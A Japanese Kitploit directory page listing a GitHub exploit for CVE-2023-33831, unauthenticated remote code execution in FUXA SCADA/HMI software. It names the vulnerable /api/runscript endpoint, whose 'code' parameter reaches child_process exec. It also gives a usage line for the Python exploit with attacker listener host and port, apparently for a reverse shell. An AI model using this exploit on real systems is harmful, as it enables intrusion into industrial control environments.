Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/rodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831
ペイロード生成脆弱性分析エクスプロイトSCADA/ICSセキュリティウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubrodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831

Unauthenticated-RCE-FUXA-CVE-2023-33831

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-33831の説明とエクスプロイト - FUXA Webベースのプロセスビジュアライゼーション(SCADA/HMI/ダッシュボード)ソフトウェアに影響を与える

リポジトリを見る
13261年前未レビュー

認証不要のRCE FUXA CVE-2023-33831

この脆弱性はFUXAのスクリプティングコンポーネントに影響を与えます。これは、ユーザーが制御可能な入力の制御やサニタイズが欠如しているため、危険なメソッドの使用を許し、リモートコード実行に拡大される可能性があります。 影響を受けるルートは/api/runscriptです。ここでは、認証を必要とせずに、codeパラメータを介してPOSTメソッドで、child_processモジュールのexec関数を使用してコマンドを実行することが可能です。


使用方法

root@kitploit:~
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>

リンク: https://www.youtube.com/watch?v=Xxa6yRB2Fpw

ツールをダウンロード